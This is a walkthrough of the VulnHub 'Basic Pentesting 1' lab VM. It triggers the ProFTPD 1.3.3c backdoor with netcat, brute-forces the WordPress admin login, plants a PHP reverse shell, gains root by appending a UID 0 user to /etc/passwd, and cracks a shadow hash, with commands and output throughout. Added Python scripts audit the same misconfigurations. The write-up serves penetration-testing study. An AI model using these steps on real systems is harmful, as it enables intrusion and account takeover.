VM : BasicPentesting1
Download Link : https://www.vulnhub.com/entry/basic-pentesting-1,216/
Start the VM and get the IP of VM :
$ nmap -sP 192.168.1.0/24
Nmap scan report for 192.168.1.1
Host is up (0.00060s latency).
Nmap scan report for 192.168.1.2
Host is up (0.000024s latency).
Nmap scan report for 192.168.1.3
Host is up (0.0014s latency).
Nmap scan report for 192.168.1.9
Host is up (0.11s latency).
Nmap scan report for 192.168.1.10
Host is up (0.0015s latency).
Nmap scan report for 192.168.1.15
Host is up (0.0012s latency).
Nmap scan report for 192.168.1.100
Host is up (0.00080s latency).
In the list above, 192.168.1.15 is our VM's IP address.
Scanning network :
$ nmap -sV 192.168.1.15
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-28 18:53 UTC
Nmap scan report for 192.168.1.15
Host is up (0.0034s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.3c
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.54 seconds
Nothing unusual, but a quick search for ProFTPD 1.3.3c reveals that this is a backdoored release of the FTP server. To trigger the backdoor we just need to connect to port 21 with netcat and send "HELP ACIDBITCHEZ".
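As an added example (not code from the original walkthrough), the following Python parses the nmap -sV output above into structured records and flags the ProFTPD 1.3.3c banner that the text calls out. The sample input is the scan output reproduced from above; the known-bad banner table is an assumption standing in for a real vulnerability feed.

```python
import re
from typing import NamedTuple

# Sample input: the nmap -sV output shown above, reproduced here so the
# example runs offline.
NMAP_OUTPUT = """\
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-28 18:53 UTC
Nmap scan report for 192.168.1.15
Host is up (0.0034s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.3c
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
"""


class Service(NamedTuple):
    port: int
    proto: str
    state: str
    name: str
    version: str


# One port line of nmap's normal output: "<port>/<proto> <state> <service> <version...>"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

# Assumed table for the example: banners an inventory check should raise.
# A real check would consult a vulnerability feed instead of a literal dict.
KNOWN_BAD_BANNERS = {
    "ProFTPD 1.3.3c": "backdoored release (see walkthrough)",
}


def parse_nmap_services(text):
    """Return the port table of an nmap -sV run as a list of Service records."""
    services = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            port, proto, state, name, version = m.groups()
            services.append(Service(int(port), proto, state, name, version.strip()))
    return services


def flag_known_bad(services):
    """Return (port, banner, reason) for every service whose version string
    starts with a banner in KNOWN_BAD_BANNERS."""
    findings = []
    for svc in services:
        for banner, reason in KNOWN_BAD_BANNERS.items():
            if svc.version.startswith(banner):
                findings.append((svc.port, banner, reason))
    return findings


if __name__ == "__main__":
    found = parse_nmap_services(NMAP_OUTPUT)
    for svc in found:
        print(f"{svc.port}/{svc.proto} {svc.name}: {svc.version}")
    for port, banner, reason in flag_known_bad(found):
        print(f"[!] port {port}: {banner} - {reason}")
```

The regex only matches port lines, so headers, the "Not shown" summary and the "Service Info" footer are skipped without special-casing.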
$ nc 192.168.1.15 21
220 ProFTPD 1.3.3c Server (vtcsec) [192.168.1.15]
HELP ACIDBITCHEZ
uname -a
Linux vtcsec 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
To get a proper interactive shell we can use a Python pty trick: python -c 'import pty;pty.spawn("/bin/bash")'
$ nc 192.168.1.15 21
python -c 'import pty;pty.spawn("/bin/bash")';
root@vtcsec:/#
We got root access to the machine. Now let's find other ways to get root.
Reconn for Web Applications :
Using dirb :
$ dirb http://192.168.1.15
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Sep 28 19:16:46 2019
URL_BASE: http://192.168.1.15/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.15/ ----
+ http://192.168.1.15/index.html (CODE:200|SIZE:177)
==> DIRECTORY: http://192.168.1.15/secret/
+ http://192.168.1.15/server-status (CODE:403|SIZE:277)
---- Entering directory: http://192.168.1.15/secret/ ----
+ http://192.168.1.15/secret/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.1.15/secret/wp-admin/
==> DIRECTORY: http://192.168.1.15/secret/wp-content/
==> DIRECTORY: http://192.168.1.15/secret/wp-includes/
+ http://192.168.1.15/secret/xmlrpc.php (CODE:405|SIZE:42)
---- Entering directory: http://192.168.1.15/secret/wp-admin/ ----
+ http://192.168.1.15/secret/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.1.15/secret/wp-admin/css/
==> DIRECTORY: http://192.168.1.15/secret/wp-admin/images/
==> DIRECTORY: http://192.168.1.15/secret/wp-admin/includes/
+ http://192.168.1.15/secret/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.1.15/secret/wp-admin/js/
==> DIRECTORY: http://192.168.1.15/secret/wp-admin/maint/
==> DIRECTORY: http://192.168.1.15/secret/wp-admin/network/
==> DIRECTORY: http://192.168.1.15/secret/wp-admin/user/
---- Entering directory: http://192.168.1.15/secret/wp-content/ ----
+ http://192.168.1.15/secret/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.1.15/secret/wp-content/plugins/
==> DIRECTORY: http://192.168.1.15/secret/wp-content/themes/
==> DIRECTORY: http://192.168.1.15/secret/wp-content/upgrade/
==> DIRECTORY: http://192.168.1.15/secret/wp-content/uploads/
---- Entering directory: http://192.168.1.15/secret/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.15/secret/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.15/secret/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.15/secret/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.15/secret/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.15/secret/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.15/secret/wp-admin/network/ ----
+ http://192.168.1.15/secret/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://192.168.1.15/secret/wp-admin/network/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.1.15/secret/wp-admin/user/ ----
+ http://192.168.1.15/secret/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://192.168.1.15/secret/wp-admin/user/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.1.15/secret/wp-content/plugins/ ----
+ http://192.168.1.15/secret/wp-content/plugins/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.1.15/secret/wp-content/themes/ ----
+ http://192.168.1.15/secret/wp-content/themes/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.1.15/secret/wp-content/upgrade/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.15/secret/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Sat Sep 28 19:17:13 2019
In the above scan we find that there is a hidden WordPress blog at http://192.168.1.15/secret/, so let's check it out.
This blog redirects to http://vtcsec/secret/, so we add vtcsec to our /etc/hosts file. The entry is written through sudo tee, because with a plain "sudo echo ... >> /etc/hosts" the redirection is done by the unprivileged shell, and the hosts format is IP address first, then hostname:
echo "192.168.1.15 vtcsec" | sudo tee -a /etc/hosts
Now the WordPress blog will open properly.
Scan wordpress blog with wpscan :
$ wpscan --url http://192.168.1.15/secret/ --enumerate u
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ _
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.7.1
WPScan.io - Online WordPress Vulnerability Scanner
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________
[+] URL: http://192.168.1.15/secret/
[+] Started: Sun Sep 29 05:46:41 2019
Interesting Finding(s):
[+] http://192.168.1.15/secret/
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] http://192.168.1.15/secret/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] http://192.168.1.15/secret/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.1.15/secret/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] http://192.168.1.15/secret/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.9.11 identified (Latest, released on 2019-09-05).
| Detected By: Emoji Settings (Passive Detection)
| - http://192.168.1.15/secret/, Match: '-release.min.js?ver=4.9.11'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.1.15/secret/, Match: 'WordPress 4.9.11'
[i] The main theme could not be detected.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <=========================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] admin
| Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/register.
[+] Finished: Sun Sep 29 05:46:42 2019
[+] Requests Done: 21
[+] Cached Requests: 29
[+] Data Sent: 5.049 KB
[+] Data Received: 10.292 KB
[+] Memory used: 90.594 MB
[+] Elapsed time: 00:00:00
As we can see, the user admin was detected by the above scan. Now let's brute-force the WordPress login, using a simple wordlist file for passwords:
$ wpscan -U admin -P common.txt --url http://192.168.1.15/secret/
And the output shows the password, which is also admin.
.....
[i] Valid Combinations Found:
| Username: admin, Password: admin
.....
Now log in to WordPress with the above credentials.
Getting a shell using php reverse shell code :
Link for php reverse shell : Github Link
Change the port number and IP address in the script, then put it into the index.php file on WordPress.
Now start a netcat listener and open the WordPress page:
$ nc -lvvp 1234
Listening on [0.0.0.0] (family 0, port 1234)
Connection from vtcsec 52724 received!
Linux vtcsec 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
04:46:01 up 2 min, 0 users, load average: 0.58, 0.60, 0.26
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$
We got a shell, but it is not a root shell, so we need to escalate privileges to root.
Getting root privilege :
1st Method: By overwriting the /etc/passwd file :
As we can see, /etc/passwd is readable and writable by all users:
$ ls -al /etc/passwd
-rw-rw-rw- 1 root root 2364 Nov 16 2017 /etc/passwd
So by appending a new user with root privileges (UID 0) and a password to the /etc/passwd file, we are able to get a root shell.
Preparing new user to append on file :
The root user's entry looks like this:
root:x:0:0:root:/root:/bin/bash
where the columns are as follows:
Username : Encrypted_Password : UserID : GroupID : UserID_Info : Home_Directory : Command_Shell
In the password column there is an x, which means the password hash is stored in the /etc/shadow file. Now let's create an encrypted password for the new user:
$ openssl passwd -1 -salt hack password123
$1$hack$MLgkAESrYp7kzYz0Ex2fV/
Where:
- -1 : MD5-based password algorithm (other options are -5 for SHA-256 and -6 for SHA-512)
- -salt : the salt, which is "hack"
- the password is password123
The entry for our new user is:
newroot:$1$hack$MLgkAESrYp7kzYz0Ex2fV/:0:0:root:/root:/bin/bash
echo "newroot:\$1\$hack\$MLgkAESrYp7kzYz0Ex2fV/:0:0:root:/root:/bin/bash" >> /etc/passwd
Note : put a \ before every $ in the password field, otherwise the shell will try to expand them as variables. Now try to log in with our newly created user.
$ su - newroot
su: must be run from a terminal
But it throws an error, meaning we need a tty, which can be obtained with the Python pty trick:
$ python -c 'import pty;pty.spawn("/bin/bash");'
www-data@vtcsec:/$
www-data@vtcsec:/$ su - newroot
su - newroot
Password: password123
root@vtcsec:~# whoami
whoami
root
root@vtcsec:~#
Yep!!!, we got the root shell!!
2nd Method: By cracking password of existing users :
This method only works if the /etc/shadow file is world-readable, which it is not by default. But in this case we can read the /etc/shadow file:
$ cat /etc/shadow
root:!:17484:0:99999:7:::
daemon:*:17379:0:99999:7:::
bin:*:17379:0:99999:7:::
....
....
....
saned:*:17379:0:99999:7:::
usbmux:*:17379:0:99999:7:::
marlinspike:$6$wQb5nV3T$xB2WO/jOkbn4t1RUILrckw69LR/0EMtUbFFCYpM3MUHVmtyYW9.ov/aszTpWhLaC2x6Fvy5tpUUxQbUhCKbl4/:17484:0:99999:7:::
mysql:!:17486:0:99999:7:::
sshd:*:17486:0:99999:7:::
The shadow file stores each account's actual password hash together with password-ageing properties; that is, it holds the sensitive account information that /etc/passwd no longer carries.
As we can see, the user marlinspike has an encrypted password:
marlinspike:$6$wQb5nV3T$xB2WO/jOkbn4t1RUILrckw69LR/0EMtUbFFCYpM3MUHVmtyYW9.ov/aszTpWhLaC2x6Fvy5tpUUxQbUhCKbl4/:17484:0:99999:7:::
Now save the above line into the file pass.txt and try to crack the hashed password with john (John the Ripper).
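Both privilege-escalation methods above come down to two misconfigurations: a world-writable /etc/passwd, which lets anyone append a UID 0 entry with an inline hash, and a world-readable /etc/shadow. The following Python audit is added here and is not part of the original walkthrough; it checks for exactly those conditions, plus weak crypt algorithms, on sample passwd/shadow content modelled on the entries shown in both sections, and its parse_hash helper pulls apart the $id$salt$hash layout that the openssl passwd explanation describes. The sample lines and file modes are constructed (the shadow mode is assumed world-readable, matching what the walkthrough could read).

```python
import stat

# Constructed sample modelled on the entries shown in the walkthrough; the
# newroot line is the entry the first method appends to /etc/passwd.
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
marlinspike:x:1000:1000:marlinspike,,,:/home/marlinspike:/bin/bash
newroot:$1$hack$MLgkAESrYp7kzYz0Ex2fV/:0:0:root:/root:/bin/bash
"""
SHADOW_SAMPLE = """\
root:!:17484:0:99999:7:::
daemon:*:17379:0:99999:7:::
marlinspike:$6$wQb5nV3T$xB2WO/jOkbn4t1RUILrckw69LR/0EMtUbFFCYpM3MUHVmtyYW9.ov/aszTpWhLaC2x6Fvy5tpUUxQbUhCKbl4/:17484:0:99999:7:::
"""
# Constructed modes: -rw-rw-rw- is what ls -al showed for /etc/passwd; the
# shadow mode is an assumed world-readable value for the example.
PASSWD_MODE = 0o666
SHADOW_MODE = 0o644

# crypt(3) identifiers -> algorithm names (the -1/-5/-6 options of openssl passwd).
# For yescrypt and bcrypt the segment after the id carries parameters, not the salt.
CRYPT_IDS = {"1": "md5crypt", "5": "sha256crypt", "6": "sha512crypt",
             "y": "yescrypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt"}
LOCKED = {"", "!", "*", "x", "!!"}
WEAK = {"md5crypt", "descrypt"}


def parse_hash(value):
    """Return (algorithm, salt) for a crypt hash field, or None if the field is
    locked, empty, or the 'x' placeholder that defers to /etc/shadow."""
    if value in LOCKED or value.startswith("!"):
        return None
    if value.startswith("$"):
        parts = value.split("$")          # ['', id, salt, hash] for $id$salt$hash
        if len(parts) < 4:
            return ("malformed", "")
        return (CRYPT_IDS.get(parts[1], "unknown"), parts[2])
    return ("descrypt", value[:2])        # traditional DES crypt: salt is the first two chars


def audit(passwd_text, shadow_text, passwd_mode, shadow_mode):
    """Return a list of human-readable findings for the given file contents and modes."""
    findings = []
    if passwd_mode & stat.S_IWOTH:
        findings.append("/etc/passwd is world-writable")
    if shadow_mode & stat.S_IROTH:
        findings.append("/etc/shadow is world-readable")
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:              # passwd has exactly seven columns
            continue
        user, pw, uid = fields[0], fields[1], fields[2]
        if uid == "0" and user != "root":
            findings.append(f"extra UID 0 account: {user}")
        parsed = parse_hash(pw)
        if parsed is not None:            # a real hash here bypasses shadow protection
            findings.append(f"password hash stored in /etc/passwd for {user} ({parsed[0]})")
    for line in shadow_text.splitlines():
        fields = line.split(":")
        if len(fields) != 9:              # shadow has exactly nine columns
            continue
        user, pw = fields[0], fields[1]
        parsed = parse_hash(pw)
        if parsed is not None and parsed[0] in WEAK:
            findings.append(f"weak hash algorithm {parsed[0]} for {user}")
    return findings


if __name__ == "__main__":
    for finding in audit(PASSWD_SAMPLE, SHADOW_SAMPLE, PASSWD_MODE, SHADOW_MODE):
        print("[!]", finding)
```

To run it against a live host, read /etc/passwd and /etc/shadow (the latter as root) and pass os.stat(path).st_mode for the two mode arguments; the mode checks use the same stat bits that ls -al renders as the trailing rw- triplet.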
root@ae3e2e69805d:~/# john pass.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
marlinspike (marlinspike)
1g 0:00:00:00 DONE 1/3 (2019-09-29 09:24) 4.347g/s 34.78p/s 34.78c/s 34.78C/s marlinspike..marlin
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@ae3e2e69805d:~/# john --show pass.txt
marlinspike:marlinspike:17484:0:99999:7:::
1 password hash cracked, 0 left
The password for marlinspike is marlinspike, so now let's try to log in to the marlinspike account.
$ su - marlinspike
su: must be run from a terminal
This means we need a tty shell again, then we switch to root.
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@vtcsec:/$ su - marlinspike
su - marlinspike
Password: marlinspike
marlinspike@vtcsec:~$ whoami
whoami
marlinspike
marlinspike@vtcsec:~$ sudo su
sudo su
[sudo] password for marlinspike: marlinspike
root@vtcsec:/home/marlinspike# whoami
whoami
root
root@vtcsec:/home/marlinspike#
We got the root shell again.